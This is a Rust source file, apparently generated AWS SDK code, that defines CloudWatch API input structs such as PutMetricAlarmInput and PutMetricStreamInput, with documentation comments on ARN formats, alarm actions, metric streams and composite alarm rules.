pub tag_keys: std::option::Option<std::vec::Vec<std::string::String>>,
}
impl std::fmt::Debug for UntagResourceInput {
fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
let mut formatter = f.debug_struct("UntagResourceInput");
formatter.field("resource_arn", &self.resource_arn);
formatter.field("tag_keys", &self.tag_keys);
formatter.finish()
}
}
#[non_exhaustive]
#[derive(std::clone::Clone, std::cmp::PartialEq)]
pub struct TagResourceInput {
/// <p>The ARN of the CloudWatch resource that you're adding tags to.</p>
/// <p>The ARN format of an alarm is
/// <code>arn:aws:cloudwatch:<i>Region</i>:<i>account-id</i>:alarm:<i>alarm-name</i>
/// </code>
/// </p>
/// <p>The ARN format of a Contributor Insights rule is
/// <code>arn:aws:cloudwatch:<i>Region</i>:<i>account-id</i>:insight-rule:<i>insight-rule-name</i>
/// </code>
/// </p>
/// <p>For more information about ARN format, see <a href="https://docs.aws.amazon.com/IAM/latest/UserGuide/list_amazoncloudwatch.html#amazoncloudwatch-resources-for-iam-policies"> Resource
/// Types Defined by Amazon CloudWatch</a> in the <i>Amazon Web Services General
/// Reference</i>.</p>
pub resource_arn: std::option::Option<std::string::String>,
/// <p>The list of key-value pairs to associate with the alarm.</p>
pub tags: std::option::Option<std::vec::Vec<crate::model::Tag>>,
}
impl std::fmt::Debug for TagResourceInput {
fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
let mut formatter = f.debug_struct("TagResourceInput");
formatter.field("resource_arn", &self.resource_arn);
formatter.field("tags", &self.tags);
formatter.finish()
}
}
#[non_exhaustive]
#[derive(std::clone::Clone, std::cmp::PartialEq)]
pub struct StopMetricStreamsInput {
/// <p>The array of the names of metric streams to stop streaming.</p>
/// <p>This is an "all or nothing" operation. If you do not have
/// permission to access all of the metric streams that you list here, then none of the streams that you list
/// in the operation will stop streaming.</p>
pub names: std::option::Option<std::vec::Vec<std::string::String>>,
}
impl std::fmt::Debug for StopMetricStreamsInput {
fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
let mut formatter = f.debug_struct("StopMetricStreamsInput");
formatter.field("names", &self.names);
formatter.finish()
}
}
#[non_exhaustive]
#[derive(std::clone::Clone, std::cmp::PartialEq)]
pub struct StartMetricStreamsInput {
/// <p>The array of the names of metric streams to start streaming.</p>
/// <p>This is an "all or nothing" operation. If you do not have
/// permission to access all of the metric streams that you list here, then none of the streams that you list
/// in the operation will start streaming.</p>
pub names: std::option::Option<std::vec::Vec<std::string::String>>,
}
impl std::fmt::Debug for StartMetricStreamsInput {
fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
let mut formatter = f.debug_struct("StartMetricStreamsInput");
formatter.field("names", &self.names);
formatter.finish()
}
}
#[non_exhaustive]
#[derive(std::clone::Clone, std::cmp::PartialEq)]
pub struct SetAlarmStateInput {
/// <p>The name of the alarm.</p>
pub alarm_name: std::option::Option<std::string::String>,
/// <p>The value of the state.</p>
pub state_value: std::option::Option<crate::model::StateValue>,
/// <p>The reason that this alarm is set to this specific state, in text format.</p>
pub state_reason: std::option::Option<std::string::String>,
/// <p>The reason that this alarm is set to this specific state, in JSON format.</p>
/// <p>For SNS or EC2 alarm actions, this is just informational. But for EC2 Auto Scaling or application Auto Scaling
/// alarm actions, the Auto Scaling policy uses the information in this field to take the correct action.</p>
pub state_reason_data: std::option::Option<std::string::String>,
}
impl std::fmt::Debug for SetAlarmStateInput {
fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
let mut formatter = f.debug_struct("SetAlarmStateInput");
formatter.field("alarm_name", &self.alarm_name);
formatter.field("state_value", &self.state_value);
formatter.field("state_reason", &self.state_reason);
formatter.field("state_reason_data", &self.state_reason_data);
formatter.finish()
}
}
#[non_exhaustive]
#[derive(std::clone::Clone, std::cmp::PartialEq)]
pub struct PutMetricStreamInput {
/// <p>If you are creating a new metric stream, this is the name for the new stream. The name
/// must be different than the names of other metric streams in this account and Region.</p>
/// <p>If you are updating a metric stream, specify the name of that stream here.</p>
/// <p>Valid characters are A-Z, a-z, 0-9, "-" and "_".</p>
pub name: std::option::Option<std::string::String>,
/// <p>If you specify this parameter, the stream sends only the
/// metrics from the metric namespaces that you specify here.</p>
/// <p>You cannot include <code>IncludeFilters</code> and <code>ExcludeFilters</code>
/// in the same operation.</p>
pub include_filters: std::option::Option<std::vec::Vec<crate::model::MetricStreamFilter>>,
/// <p>If you specify this parameter, the stream sends metrics from all
/// metric namespaces except for the namespaces that you specify here.</p>
/// <p>You cannot include <code>ExcludeFilters</code> and <code>IncludeFilters</code> in
/// the same operation.</p>
pub exclude_filters: std::option::Option<std::vec::Vec<crate::model::MetricStreamFilter>>,
/// <p>The ARN of the Amazon Kinesis Firehose delivery stream to use for this metric stream.
/// This Amazon Kinesis Firehose delivery stream must already exist and must be in the same
/// account as the metric stream.</p>
pub firehose_arn: std::option::Option<std::string::String>,
/// <p>The ARN of an IAM role that this metric stream will use to access
/// Amazon Kinesis Firehose resources. This IAM role must already
/// exist and must be in the same account as the metric stream. This IAM role must include the following permissions:</p>
/// <ul>
/// <li>
/// <p>firehose:PutRecord</p>
/// </li>
/// <li>
/// <p>firehose:PutRecordBatch</p>
/// </li>
/// </ul>
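/// <p>A minimal sketch of such a policy statement (illustrative only; scope the
/// <code>Resource</code> to your own delivery stream in practice):</p>
/// <p>
/// <code>{"Version": "2012-10-17", "Statement": [{"Effect": "Allow",
/// "Action": ["firehose:PutRecord", "firehose:PutRecordBatch"],
/// "Resource": "arn:aws:firehose:us-east-1:123456789012:deliverystream/my-stream"}]}</code>
/// </p>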
pub role_arn: std::option::Option<std::string::String>,
/// <p>The output format for the stream. Valid values are <code>json</code>
/// and <code>opentelemetry0.7</code>. For more information about metric stream
/// output formats, see
/// <a href="https://docs.aws.amazon.com/AmazonCloudWatch/latest/monitoring/CloudWatch-metric-streams-formats.html">
/// Metric streams output formats</a>.</p>
pub output_format: std::option::Option<crate::model::MetricStreamOutputFormat>,
/// <p>A list of key-value pairs to associate with the metric stream. You can associate as
/// many as 50 tags with a metric stream.</p>
/// <p>Tags can help you organize and categorize your resources. You can also use them to scope user
/// permissions by granting a user
/// permission to access or change only resources with certain tag values.</p>
pub tags: std::option::Option<std::vec::Vec<crate::model::Tag>>,
}
impl std::fmt::Debug for PutMetricStreamInput {
fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
let mut formatter = f.debug_struct("PutMetricStreamInput");
formatter.field("name", &self.name);
formatter.field("include_filters", &self.include_filters);
formatter.field("exclude_filters", &self.exclude_filters);
formatter.field("firehose_arn", &self.firehose_arn);
formatter.field("role_arn", &self.role_arn);
formatter.field("output_format", &self.output_format);
formatter.field("tags", &self.tags);
formatter.finish()
}
}
#[non_exhaustive]
#[derive(std::clone::Clone, std::cmp::PartialEq)]
pub struct PutMetricDataInput {
/// <p>The namespace for the metric data.</p>
/// <p>To avoid conflicts
/// with AWS service namespaces, you should not specify a namespace that begins with <code>AWS/</code>
/// </p>
pub namespace: std::option::Option<std::string::String>,
/// <p>The data for the metric. The array can include no more than 20 metrics per call.</p>
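/// <p>A minimal sketch of assembling one datum in code (assumes the usual
/// generated builder on <code>MetricDatum</code>; the names and values are illustrative):</p>
/// <p>
/// <code>let datum = crate::model::MetricDatum::builder().metric_name("PageViews").value(123.0).build();</code>
/// </p>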
pub metric_data: std::option::Option<std::vec::Vec<crate::model::MetricDatum>>,
}
impl std::fmt::Debug for PutMetricDataInput {
fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
let mut formatter = f.debug_struct("PutMetricDataInput");
formatter.field("namespace", &self.namespace);
formatter.field("metric_data", &self.metric_data);
formatter.finish()
}
}
#[non_exhaustive]
#[derive(std::clone::Clone, std::cmp::PartialEq)]
pub struct PutMetricAlarmInput {
/// <p>The name for the alarm. This name must be unique within the Region.</p>
pub alarm_name: std::option::Option<std::string::String>,
/// <p>The description for the alarm.</p>
pub alarm_description: std::option::Option<std::string::String>,
/// <p>Indicates whether actions should be executed during any changes to the alarm state. The default is
/// <code>TRUE</code>.</p>
pub actions_enabled: std::option::Option<bool>,
/// <p>The actions to execute when this alarm transitions to an <code>OK</code> state
/// from any other state. Each action is specified as an Amazon Resource Name (ARN).</p>
/// <p>Valid Values: <code>arn:aws:automate:<i>region</i>:ec2:stop</code> |
/// <code>arn:aws:automate:<i>region</i>:ec2:terminate</code> |
/// <code>arn:aws:automate:<i>region</i>:ec2:recover</code> |
/// <code>arn:aws:automate:<i>region</i>:ec2:reboot</code> |
/// <code>arn:aws:sns:<i>region</i>:<i>account-id</i>:<i>sns-topic-name</i>
/// </code> |
/// <code>arn:aws:autoscaling:<i>region</i>:<i>account-id</i>:scalingPolicy:<i>policy-id</i>:autoScalingGroupName/<i>group-friendly-name</i>:policyName/<i>policy-friendly-name</i>
/// </code>
/// </p>
/// <p>Valid Values (for use with IAM roles):
/// <code>arn:aws:swf:<i>region</i>:<i>account-id</i>:action/actions/AWS_EC2.InstanceId.Stop/1.0</code> |
/// <code>arn:aws:swf:<i>region</i>:<i>account-id</i>:action/actions/AWS_EC2.InstanceId.Terminate/1.0</code> |
/// <code>arn:aws:swf:<i>region</i>:<i>account-id</i>:action/actions/AWS_EC2.InstanceId.Reboot/1.0</code> |
/// <code>arn:aws:swf:<i>region</i>:<i>account-id</i>:action/actions/AWS_EC2.InstanceId.Recover/1.0</code>
/// </p>
pub ok_actions: std::option::Option<std::vec::Vec<std::string::String>>,
/// <p>The actions to execute when this alarm transitions to the <code>ALARM</code> state from any other state.
/// Each action is specified as an Amazon Resource Name (ARN).</p>
/// <p>Valid Values: <code>arn:aws:automate:<i>region</i>:ec2:stop</code> |
/// <code>arn:aws:automate:<i>region</i>:ec2:terminate</code> |
/// <code>arn:aws:automate:<i>region</i>:ec2:recover</code> |
/// <code>arn:aws:automate:<i>region</i>:ec2:reboot</code> |
/// <code>arn:aws:sns:<i>region</i>:<i>account-id</i>:<i>sns-topic-name</i>
/// </code> |
/// <code>arn:aws:autoscaling:<i>region</i>:<i>account-id</i>:scalingPolicy:<i>policy-id</i>:autoScalingGroupName/<i>group-friendly-name</i>:policyName/<i>policy-friendly-name</i>
/// </code>
/// | <code>arn:aws:ssm:<i>region</i>:<i>account-id</i>:opsitem:<i>severity</i>
/// </code>
/// </p>
/// <p>Valid Values (for use with IAM roles):
/// <code>arn:aws:swf:<i>region</i>:<i>account-id</i>:action/actions/AWS_EC2.InstanceId.Stop/1.0</code> |
/// <code>arn:aws:swf:<i>region</i>:<i>account-id</i>:action/actions/AWS_EC2.InstanceId.Terminate/1.0</code> |
/// <code>arn:aws:swf:<i>region</i>:<i>account-id</i>:action/actions/AWS_EC2.InstanceId.Reboot/1.0</code>
/// </p>
pub alarm_actions: std::option::Option<std::vec::Vec<std::string::String>>,
/// <p>The actions to execute when this alarm transitions to the <code>INSUFFICIENT_DATA</code> state from any other state.
/// Each action is specified as an Amazon Resource Name (ARN).</p>
/// <p>Valid Values: <code>arn:aws:automate:<i>region</i>:ec2:stop</code> |
/// <code>arn:aws:automate:<i>region</i>:ec2:terminate</code> |
/// <code>arn:aws:automate:<i>region</i>:ec2:recover</code> |
/// <code>arn:aws:automate:<i>region</i>:ec2:reboot</code> |
/// <code>arn:aws:sns:<i>region</i>:<i>account-id</i>:<i>sns-topic-name</i>
/// </code> |
/// <code>arn:aws:autoscaling:<i>region</i>:<i>account-id</i>:scalingPolicy:<i>policy-id</i>:autoScalingGroupName/<i>group-friendly-name</i>:policyName/<i>policy-friendly-name</i>
/// </code>
/// </p>
/// <p>Valid Values (for use with IAM roles):
/// <code>arn:aws:swf:<i>region</i>:<i>account-id</i>:action/actions/AWS_EC2.InstanceId.Stop/1.0</code> |
/// <code>arn:aws:swf:<i>region</i>:<i>account-id</i>:action/actions/AWS_EC2.InstanceId.Terminate/1.0</code> |
/// <code>arn:aws:swf:<i>region</i>:<i>account-id</i>:action/actions/AWS_EC2.InstanceId.Reboot/1.0</code>
/// </p>
pub insufficient_data_actions: std::option::Option<std::vec::Vec<std::string::String>>,
/// <p>The name for the metric associated with the alarm. For each <code>PutMetricAlarm</code>
/// operation, you must specify either <code>MetricName</code> or a <code>Metrics</code> array.</p>
/// <p>If you are creating an alarm based on a math expression, you cannot specify this parameter, or any of the
/// <code>Dimensions</code>, <code>Period</code>,
/// <code>Namespace</code>, <code>Statistic</code>, or <code>ExtendedStatistic</code> parameters. Instead, you specify
/// all this information in the <code>Metrics</code> array.</p>
pub metric_name: std::option::Option<std::string::String>,
/// <p>The namespace for the metric specified in <code>MetricName</code>.</p>
pub namespace: std::option::Option<std::string::String>,
/// <p>The statistic for the metric specified in <code>MetricName</code>, other than percentile.
/// For percentile statistics, use <code>ExtendedStatistic</code>. When you call <code>PutMetricAlarm</code> and specify
/// a <code>MetricName</code>, you must
/// specify either <code>Statistic</code> or <code>ExtendedStatistic</code>, but not both.</p>
pub statistic: std::option::Option<crate::model::Statistic>,
/// <p>The percentile statistic for the metric specified in <code>MetricName</code>. Specify a value
/// between p0.0 and p100. When you call <code>PutMetricAlarm</code> and specify
/// a <code>MetricName</code>, you must
/// specify either <code>Statistic</code> or <code>ExtendedStatistic</code>, but not both.</p>
pub extended_statistic: std::option::Option<std::string::String>,
/// <p>The dimensions for the metric specified in <code>MetricName</code>.</p>
pub dimensions: std::option::Option<std::vec::Vec<crate::model::Dimension>>,
/// <p>The length, in seconds, used each time the metric specified in <code>MetricName</code> is
/// evaluated. Valid values are 10, 30, and any multiple of 60.</p>
/// <p>
/// <code>Period</code> is required for alarms based on static thresholds. If
/// you are creating an alarm based on a metric math expression, you specify the
/// period for each metric within the objects in the <code>Metrics</code> array.</p>
/// <p>Be sure to specify 10 or 30 only for metrics that are stored by a <code>PutMetricData</code> call with a
/// <code>StorageResolution</code> of 1. If you specify a period of 10 or 30 for a metric that does not have
/// sub-minute resolution, the alarm still attempts to gather data at the period rate that you specify. In this case,
/// it does not receive data for the attempts that do not correspond to a one-minute data resolution, and the alarm
/// might often lapse into INSUFFICIENT_DATA status. Specifying 10 or 30 also sets this alarm as a high-resolution alarm,
/// which has a higher charge than other alarms. For more information about pricing, see <a href="https://aws.amazon.com/cloudwatch/pricing/">Amazon CloudWatch Pricing</a>.</p>
/// <p>An alarm's total current evaluation period can
/// be no longer than one day, so <code>Period</code> multiplied by <code>EvaluationPeriods</code> cannot be more than 86,400 seconds.</p>
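/// <p>For example, with a <code>Period</code> of 300 seconds and
/// <code>EvaluationPeriods</code> of 288, the total evaluation period is
/// 300 * 288 = 86,400 seconds, exactly the one-day maximum.</p>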
pub period: std::option::Option<i32>,
/// <p>The unit of measure for the statistic. For example, the units for the Amazon EC2
/// NetworkIn metric are Bytes because NetworkIn tracks the number of bytes that an instance
/// receives on all network interfaces. You can also specify a unit when you create a custom
/// metric. Units help provide conceptual meaning to your data. Metric data points that
/// specify a unit of measure, such as Percent, are aggregated separately.</p>
/// <p>If you don't specify <code>Unit</code>, CloudWatch retrieves all unit types that have been published for the
/// metric and attempts to evaluate the alarm.
/// Usually, metrics are
/// published with only one unit, so the alarm
/// works as intended.</p>
/// <p>However, if the metric is published with multiple types of units and you don't specify a unit, the alarm's
/// behavior is not defined and
/// it behaves unpredictably.</p>
/// <p>We recommend omitting <code>Unit</code> so that you don't inadvertently
/// specify an incorrect unit that is not published for this metric. Specifying an unpublished
/// unit causes the alarm to be stuck in the <code>INSUFFICIENT_DATA</code> state.</p>
pub unit: std::option::Option<crate::model::StandardUnit>,
/// <p>The number of periods over which data is compared to the specified threshold. If you are
/// setting an alarm that requires that a number of consecutive data points be breaching to
/// trigger the alarm, this value specifies that number. If you are setting an "M out of N"
/// alarm, this value is the N.</p>
/// <p>An alarm's total current evaluation period can
/// be no longer than one day, so this number multiplied by <code>Period</code> cannot be more than 86,400 seconds.</p>
pub evaluation_periods: std::option::Option<i32>,
/// <p>The number of data points that must be breaching to trigger the alarm. This is used only if you are setting
/// an "M out of N" alarm. In that case, this value is the M. For more information, see
/// <a href="https://docs.aws.amazon.com/AmazonCloudWatch/latest/monitoring/AlarmThatSendsEmail.html#alarm-evaluation">Evaluating an Alarm</a> in the
/// <i>Amazon CloudWatch User Guide</i>.</p>
pub datapoints_to_alarm: std::option::Option<i32>,
/// <p>The value against which the specified statistic is compared.</p>
/// <p>This parameter is required for alarms based on static thresholds, but should
/// not be used for alarms based on anomaly detection models.</p>
pub threshold: std::option::Option<f64>,
/// <p> The arithmetic operation to use when comparing the specified statistic and
/// threshold. The specified statistic value is used as the first operand.</p>
/// <p>The values <code>LessThanLowerOrGreaterThanUpperThreshold</code>,
/// <code>LessThanLowerThreshold</code>, and <code>GreaterThanUpperThreshold</code>
/// are used only for alarms based on anomaly detection models.</p>
pub comparison_operator: std::option::Option<crate::model::ComparisonOperator>,
/// <p> Sets how this alarm is to handle missing data points. If <code>TreatMissingData</code> is omitted, the default behavior of <code>missing</code> is used.
/// For more information, see <a href="https://docs.aws.amazon.com/AmazonCloudWatch/latest/monitoring/AlarmThatSendsEmail.html#alarms-and-missing-data">Configuring How CloudWatch
/// Alarms Treats Missing Data</a>.</p>
/// <p>Valid Values: <code>breaching | notBreaching | ignore | missing</code>
/// </p>
pub treat_missing_data: std::option::Option<std::string::String>,
/// <p> Used only for alarms based on percentiles. If you specify <code>ignore</code>, the alarm state does not change during periods with too few data points to be
/// statistically significant. If you specify <code>evaluate</code> or omit this parameter, the alarm is always evaluated and possibly changes state
/// no matter how many data points are available. For more information, see <a href="https://docs.aws.amazon.com/AmazonCloudWatch/latest/monitoring/AlarmThatSendsEmail.html#percentiles-with-low-samples">Percentile-Based CloudWatch Alarms and Low Data Samples</a>.</p>
/// <p>Valid Values: <code>evaluate | ignore</code>
/// </p>
pub evaluate_low_sample_count_percentile: std::option::Option<std::string::String>,
/// <p>An array of <code>MetricDataQuery</code> structures that enable you to create an alarm based on the result of a
/// metric math expression. For each <code>PutMetricAlarm</code>
/// operation, you must specify either <code>MetricName</code> or a <code>Metrics</code> array.</p>
/// <p>Each item in the <code>Metrics</code> array either retrieves a metric or performs a math expression.</p>
/// <p>One item in the <code>Metrics</code> array is the expression that the alarm watches. You designate this expression
/// by setting <code>ReturnData</code> to true for this object in the array. For more information, see <a href="https://docs.aws.amazon.com/AmazonCloudWatch/latest/APIReference/API_MetricDataQuery.html">MetricDataQuery</a>.</p>
/// <p>If you use the <code>Metrics</code> parameter, you cannot include the <code>MetricName</code>, <code>Dimensions</code>, <code>Period</code>,
/// <code>Namespace</code>, <code>Statistic</code>, or <code>ExtendedStatistic</code> parameters of <code>PutMetricAlarm</code> in the same operation.
/// Instead, you retrieve
/// the metrics you are using in your math expression as part of the <code>Metrics</code> array.</p>
pub metrics: std::option::Option<std::vec::Vec<crate::model::MetricDataQuery>>,
/// <p>A list of key-value pairs to associate with the alarm. You can associate as many as 50 tags with an alarm.</p>
/// <p>Tags can help you organize and categorize your resources. You can also use them to scope user
/// permissions by granting a user
/// permission to access or change only resources with certain tag values.</p>
/// <p>If you are using this operation to update an existing alarm, any tags
/// you specify in this parameter are ignored. To change the tags of an existing alarm, use
/// <a href="https://docs.aws.amazon.com/AmazonCloudWatch/latest/APIReference/API_TagResource.html">TagResource</a>
/// or <a href="https://docs.aws.amazon.com/AmazonCloudWatch/latest/APIReference/API_UntagResource.html">UntagResource</a>.</p>
pub tags: std::option::Option<std::vec::Vec<crate::model::Tag>>,
/// <p>If this is an alarm based on an anomaly detection model, make this value match
/// the ID of
/// the <code>ANOMALY_DETECTION_BAND</code> function.</p>
/// <p>For an example of how to use this parameter, see the
/// <b>Anomaly Detection
/// Model Alarm</b> example on this page.</p>
/// <p>If your alarm uses this parameter, it cannot have Auto Scaling actions.</p>
pub threshold_metric_id: std::option::Option<std::string::String>,
}
impl std::fmt::Debug for PutMetricAlarmInput {
fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
let mut formatter = f.debug_struct("PutMetricAlarmInput");
formatter.field("alarm_name", &self.alarm_name);
formatter.field("alarm_description", &self.alarm_description);
formatter.field("actions_enabled", &self.actions_enabled);
formatter.field("ok_actions", &self.ok_actions);
formatter.field("alarm_actions", &self.alarm_actions);
formatter.field("insufficient_data_actions", &self.insufficient_data_actions);
formatter.field("metric_name", &self.metric_name);
formatter.field("namespace", &self.namespace);
formatter.field("statistic", &self.statistic);
formatter.field("extended_statistic", &self.extended_statistic);
formatter.field("dimensions", &self.dimensions);
formatter.field("period", &self.period);
formatter.field("unit", &self.unit);
formatter.field("evaluation_periods", &self.evaluation_periods);
formatter.field("datapoints_to_alarm", &self.datapoints_to_alarm);
formatter.field("threshold", &self.threshold);
formatter.field("comparison_operator", &self.comparison_operator);
formatter.field("treat_missing_data", &self.treat_missing_data);
formatter.field(
"evaluate_low_sample_count_percentile",
&self.evaluate_low_sample_count_percentile,
);
formatter.field("metrics", &self.metrics);
formatter.field("tags", &self.tags);
formatter.field("threshold_metric_id", &self.threshold_metric_id);
formatter.finish()
}
}
#[non_exhaustive]
#[derive(std::clone::Clone, std::cmp::PartialEq)]
pub struct PutInsightRuleInput {
/// <p>A unique name for the rule.</p>
pub rule_name: std::option::Option<std::string::String>,
/// <p>The state of the rule. Valid values are ENABLED and DISABLED.</p>
pub rule_state: std::option::Option<std::string::String>,
/// <p>The definition of the rule, as a JSON object. For details on the valid syntax, see
/// <a href="https://docs.aws.amazon.com/AmazonCloudWatch/latest/monitoring/ContributorInsights-RuleSyntax.html">Contributor Insights
/// Rule Syntax</a>.</p>
pub rule_definition: std::option::Option<std::string::String>,
/// <p>A list of key-value pairs to associate with the Contributor Insights rule.
/// You can associate as many as 50 tags with a rule.</p>
/// <p>Tags can help you organize and categorize your
/// resources. You can also use them to scope user permissions, by
/// granting a user permission to access or change only the resources that have
/// certain tag values.</p>
/// <p>To be able to associate tags with a rule, you must have the <code>cloudwatch:TagResource</code>
/// permission in addition to the <code>cloudwatch:PutInsightRule</code> permission.</p>
/// <p>If you are using this operation to update an existing Contributor Insights rule, any tags
/// you specify in this parameter are ignored. To change the tags of an existing rule, use
/// <a href="https://docs.aws.amazon.com/AmazonCloudWatch/latest/APIReference/API_TagResource.html">TagResource</a>.</p>
pub tags: std::option::Option<std::vec::Vec<crate::model::Tag>>,
}
impl std::fmt::Debug for PutInsightRuleInput {
fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
let mut formatter = f.debug_struct("PutInsightRuleInput");
formatter.field("rule_name", &self.rule_name);
formatter.field("rule_state", &self.rule_state);
formatter.field("rule_definition", &self.rule_definition);
formatter.field("tags", &self.tags);
formatter.finish()
}
}
#[non_exhaustive]
#[derive(std::clone::Clone, std::cmp::PartialEq)]
pub struct PutDashboardInput {
/// <p>The name of the dashboard. If a dashboard with this name already exists, this call modifies that dashboard, replacing
/// its current contents. Otherwise, a new dashboard is created. The maximum length is 255, and valid characters are
/// A-Z, a-z, 0-9, "-", and "_". This parameter is required.</p>
pub dashboard_name: std::option::Option<std::string::String>,
/// <p>The detailed information about the dashboard in JSON format, including the widgets to include and their location
/// on the dashboard. This parameter is required.</p>
/// <p>For more information about the syntax,
/// see <a href="https://docs.aws.amazon.com/AmazonCloudWatch/latest/APIReference/CloudWatch-Dashboard-Body-Structure.html">Dashboard Body Structure and Syntax</a>.</p>
pub dashboard_body: std::option::Option<std::string::String>,
}
impl std::fmt::Debug for PutDashboardInput {
fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
let mut formatter = f.debug_struct("PutDashboardInput");
formatter.field("dashboard_name", &self.dashboard_name);
formatter.field("dashboard_body", &self.dashboard_body);
formatter.finish()
}
}
#[non_exhaustive]
#[derive(std::clone::Clone, std::cmp::PartialEq)]
pub struct PutCompositeAlarmInput {
/// <p>Indicates whether actions should be executed during any changes to the alarm state of the composite alarm. The default is
/// <code>TRUE</code>.</p>
pub actions_enabled: std::option::Option<bool>,
/// <p>The actions to execute when this alarm transitions to the <code>ALARM</code> state from any other state.
/// Each action is specified as an Amazon Resource Name (ARN).</p>
/// <p>Valid Values: <code>arn:aws:sns:<i>region</i>:<i>account-id</i>:<i>sns-topic-name</i>
/// </code>
/// | <code>arn:aws:ssm:<i>region</i>:<i>account-id</i>:opsitem:<i>severity</i>
/// </code>
/// </p>
pub alarm_actions: std::option::Option<std::vec::Vec<std::string::String>>,
/// <p>The description for the composite alarm.</p>
pub alarm_description: std::option::Option<std::string::String>,
/// <p>The name for the composite alarm. This name must be unique within the Region.</p>
pub alarm_name: std::option::Option<std::string::String>,
/// <p>An expression that specifies which other alarms are to be evaluated to determine this
/// composite alarm's state. For each alarm that you reference, you
/// designate a function that
/// specifies whether that alarm needs to be in ALARM state, OK state, or INSUFFICIENT_DATA state. You
/// can use operators (AND, OR, and NOT) to combine multiple functions in a single expression. You can use parentheses to logically group the
/// functions in your expression.</p>
/// <p>You can use either alarm names or ARNs to reference the other alarms that are to be evaluated.</p>
/// <p>Functions can include the following:</p>
/// <ul>
/// <li>
/// <p>
/// <code>ALARM("<i>alarm-name</i> or <i>alarm-ARN</i>")</code> is TRUE if the named
/// alarm is in ALARM state.</p>
/// </li>
/// <li>
/// <p>
/// <code>OK("<i>alarm-name</i> or <i>alarm-ARN</i>")</code> is TRUE if the named
/// alarm is in OK state.</p>
/// </li>
/// <li>
/// <p>
/// <code>INSUFFICIENT_DATA("<i>alarm-name</i> or <i>alarm-ARN</i>")</code> is TRUE if the named
/// alarm is in INSUFFICIENT_DATA state.</p>
/// </li>
/// <li>
/// <p>
/// <code>TRUE</code> always evaluates to TRUE.</p>
/// </li>
/// <li>
/// <p>
/// <code>FALSE</code> always evaluates to FALSE.</p>
/// </li>
/// </ul>
/// <p>TRUE and FALSE are useful for testing a complex <code>AlarmRule</code> structure, and
/// for testing your alarm actions.</p>
/// <p>Alarm names specified in <code>AlarmRule</code> can be surrounded with double-quotes ("), but do not have to be.</p>
/// <p>The following
/// are some examples of <code>AlarmRule</code>:</p>
/// <ul>
/// <li>
/// <p>
/// <code>ALARM(CPUUtilizationTooHigh) AND ALARM(DiskReadOpsTooHigh)</code> specifies that the composite alarm goes into ALARM state only
/// if both CPUUtilizationTooHigh and DiskReadOpsTooHigh alarms are in ALARM state.</p>
/// </li>
/// <li>
/// <p>
/// <code>ALARM(CPUUtilizationTooHigh) AND NOT ALARM(DeploymentInProgress)</code>
/// specifies that the alarm goes to ALARM state if CPUUtilizationTooHigh is in ALARM state
/// and DeploymentInProgress is not in ALARM state. This example reduces
/// alarm noise during a known deployment window.</p>
/// </li>
/// <li>
/// <p>
/// <code>(ALARM(CPUUtilizationTooHigh) OR ALARM(DiskReadOpsTooHigh)) AND OK(NetworkOutTooHigh)</code> goes into ALARM
/// state if CPUUtilizationTooHigh OR DiskReadOpsTooHigh is in ALARM state, and if NetworkOutTooHigh is in OK state.
/// This provides another example of using a composite alarm to prevent noise. This rule ensures that you are not notified with an
/// alarm action on high CPU or disk usage if a known network problem is also occurring.</p>
/// </li>
/// </ul>
/// <p>The <code>AlarmRule</code> can specify as many as 100
/// "children" alarms. The <code>AlarmRule</code> expression can have as many as 500 elements. Elements
/// are child alarms, TRUE or FALSE statements, and
/// parentheses.</p>
pub alarm_rule: std::option::Option<std::string::String>,
/// <p>The actions to execute when this alarm transitions to the <code>INSUFFICIENT_DATA</code> state from any other state.
/// Each action is specified as an Amazon Resource Name (ARN).</p>
/// <p>Valid Values: <code>arn:aws:sns:<i>region</i>:<i>account-id</i>:<i>sns-topic-name</i>
/// </code>
/// </p>
pub insufficient_data_actions: std::option::Option<std::vec::Vec<std::string::String>>,
/// <p>The actions to execute when this alarm transitions to an <code>OK</code> state
/// from any other state. Each action is specified as an Amazon Resource Name (ARN).</p>
/// <p>Valid Values: <code>arn:aws:sns:<i>region</i>:<i>account-id</i>:<i>sns-topic-name</i>
/// </code>
/// </p>
pub ok_actions: std::option::Option<std::vec::Vec<std::string::String>>,
/// <p>A list of key-value pairs to associate with the composite alarm. You can associate as many as 50 tags with an alarm.</p>
/// <p>Tags can help you organize and categorize your
/// resources. You can also use them to scope user permissions, by granting a user permission to access or change only resources with
/// certain tag values.</p>
pub tags: std::option::Option<std::vec::Vec<crate::model::Tag>>,
}
impl std::fmt::Debug for PutCompositeAlarmInput {
fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
let mut formatter = f.debug_struct("PutCompositeAlarmInput");
formatter.field("actions_enabled", &self.actions_enabled);
formatter.field("alarm_actions", &self.alarm_actions);
formatter.field("alarm_description", &self.alarm_description);
formatter.field("alarm_name", &self.alarm_name);
formatter.field("alarm_rule", &self.alarm_rule);
formatter.field("insufficient_data_actions", &self.insufficient_data_actions);
formatter.field("ok_actions", &self.ok_actions);
formatter.field("tags", &self.tags);
formatter.finish()
}
}
#[non_exhaustive]
#[derive(std::clone::Clone, std::cmp::PartialEq)]
pub struct PutAnomalyDetectorInput {
/// <p>The namespace of the metric to create the anomaly detection model for.</p>
pub namespace: std::option::Option<std::string::String>,
/// <p>The name of the metric to create the anomaly detection model for.</p>
pub metric_name: std::option::Option<std::string::String>,
/// <p>The metric dimensions to create the anomaly detection model for.</p>
pub dimensions: std::option::Option<std::vec::Vec<crate::model::Dimension>>,
/// <p>The statistic to use for the metric and the anomaly detection model.</p>
pub stat: std::option::Option<std::string::String>,
/// <p>The configuration specifies details about how the
/// anomaly detection model is to be trained, including
/// time ranges to exclude when training and updating the model.
/// You can specify as many as 10 time ranges.</p>
/// <p>The configuration can also include the time zone to use for
/// the metric.</p>
pub configuration: std::option::Option<crate::model::AnomalyDetectorConfiguration>,
}
